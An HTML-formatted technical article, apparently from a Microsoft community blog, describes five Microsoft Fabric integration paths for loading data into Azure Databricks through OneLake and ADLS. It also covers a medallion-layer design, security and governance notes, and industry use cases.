&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Note: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;This article describes a solution idea. Your cloud architect can use this guidance to help visualize the major components for a typical implementation. Use this article as a starting point to design a well-architected solution that aligns with your workload’s specific requirements.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;As organizations adopt Microsoft Fabric as their unified analytics platform, it has become a leading path for ingesting both streaming and batch data into Azure Databricks. This article covers integration approaches -via Microsoft Fabric- and details the five Fabric-specific paths that connect OneLake/ADLS and Databricks for end-to-end data processing.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Medallion Architecture&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;P class="lia-indent-padding-left-30px"&gt;&lt;SPAN data-contrast="auto"&gt;The following data flow corresponds to the architecture diagram:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px"&gt;&lt;SPAN data-contrast="auto"&gt;Data is ingested through Microsoft Fabric (via Mirroring, RTI, or Data Factory) lands data into OneLake/ADLS. With the medallion pattern, consisting of Bronze, Silver, and Gold storage layers, organizations have flexible access and extendable data processing:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:0,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:0}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Bronze&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Raw data entry point. Data arrives in its source format and is converted to the open, transactional Delta Lake format.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Silver&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Optimized for BI and data science. ETL and stream processing tasks filter, clean, transform, join, and aggregate Bronze data into curated datasets using SQL, Python, R, or Scala.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Gold&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Enriched data ready for analytics and reporting. Analysts use Power BI, PySpark, SQL, or Excel for insights and queries.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Fabric Integration Paths&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;img&gt;&lt;SPAN data-contrast="auto"&gt;Figure: Five Microsoft Fabric integration paths into Azure Databricks&lt;/SPAN&gt;&lt;/img&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;SPAN data-contrast="none"&gt;&lt;STRONG&gt;Note: &lt;/STRONG&gt;&lt;/SPAN&gt;&lt;SPAN data-contrast="none"&gt;This architecture establishes a complete loop-back between Microsoft Fabric and Azure Databricks, enabling Gold layer tables to be seamlessly mirrored back to Microsoft Fabric for dashboarding through Azure Databricks Mirroring.&lt;/SPAN&gt; &lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:120,&amp;quot;335559739&amp;quot;:0}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H4&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;The following five paths connect Microsoft Fabric to Azure Databricks:&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Fabric Mirroring to OneLake&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt; – A low-cost, low-latency turnkey solution that creates a replica of data from operational sources (SQL Server, Azure Cosmos DB, Oracle) in OneLake. Handles the initial load and ongoing CDC changes automatically, keeping data continuously up to date.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Fabric RTI to OneLake&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Fabric Real-Time Intelligence ingests streaming event data into OneLake with sub-second latency, enabling real-time analytics on live event streams.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Fabric Data Factory to OneLake&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt; – Orchestrates ingestion from diverse sources not covered by Mirroring (such as Sybase or REST APIs) and lands data in OneLake, ensuring complete source coverage.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;OneLake to Azure Databricks&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Unity Catalog connections to OneLake, secured via Managed Identities from Microsoft Entra ID, allow Databricks to query OneLake data items as a native catalog without data duplication.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt;Fabric Data Factory to Azure Databricks (direct&lt;/STRONG&gt;)&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; – Orchestrates ingestion from diverse sources directly into Azure Data Lake Storage (ADLS), where Azure Databricks picks up the data for medallion architecture processing.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/OL&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Requirement-Specific Notes&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Data Ingestion&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;Microsoft Fabric Mirroring currently supports SQL Server, Azure Cosmos DB, and Oracle as source systems. For sources not yet supported by Mirroring—such as Sybase or REST APIs—use Fabric Data Factory pipelines to ensure full coverage across all data systems.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;Once data is in the landing zone with the correct format, Mirroring’s CDC replication starts automatically and manages the complexity of merging changes (updates, inserts, and deletes) into Delta tables, keeping data in Fabric continuously up to date. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/mirroring/overview#how-does-open-mirroring-work" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about open mirroring&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Storage Format and Time Travel&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;OneLake supports Delta tables, enabling schema evolution and time travel across all data stored in the lakehouse. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/data-engineering/lakehouse-and-delta-tables" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about OneLake and Delta tables&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Security&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Encryption at rest: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;OneLake automatically encrypts all data at rest using Microsoft-managed keys, compliant with FIPS 140-2 standards. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/onelake/security/get-started-security#data-at-rest" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt;Encryption in transit:&lt;/STRONG&gt; &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;All data in transit is encrypted using TLS 1.2 or higher, securing data movement between Fabric, OneLake, and Azure Databricks. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/onelake/security/get-started-security#data-in-transit" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Data Governance&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;OneLake can be registered and scanned by Microsoft Purview, enabling cataloging of stored metadata and data quality profiling. This protects sensitive information, including PHI and PII, across ingestion and analytics workflows. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/purview/unified-catalog-data-quality-fabric-lakehouse" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about Purview with Fabric Lakehouse&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Operations and Monitoring&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;Use the Fabric monitor hub to track pipeline health, Spark application performance, and ingestion job status across all Fabric workloads. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/data-engineering/browse-spark-applications-monitoring-hub" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about the Fabric monitor hub&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Scenario Details&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;P class="lia-indent-padding-left-30px"&gt;&lt;SPAN data-contrast="auto"&gt;This architecture applies to any organization that needs to unify streaming and batch data at scale. Common characteristics include:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;Multiple operational data sources (databases, SaaS applications, event streams)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;A requirement to process both real-time and historical data in the same platform&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;Governance and compliance requirements for sensitive data (PHI, PII, financial records)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;Analytics consumers spanning BI (Power BI), data science (Databricks notebooks), and ML workloads&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 aria-level="3"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Potential Use Cases&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Healthcare and life sciences&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– PHI/PII protection via Purview; real-time patient telemetry + batch EHR analytics&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Financial services&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Real-time fraud detection streams + batch regulatory reporting&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Retail and e-commerce&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Streaming clickstream analytics + batch inventory and supply chain processing&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Energy and utilities&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– IoT sensor telemetry streaming + batch consumption analytics&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Next Steps&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/mirroring/overview" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Get started with Microsoft Fabric Mirroring&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/databricks/delta-live-tables/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Build an ETL pipeline with Lakeflow Declarative Pipelines&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
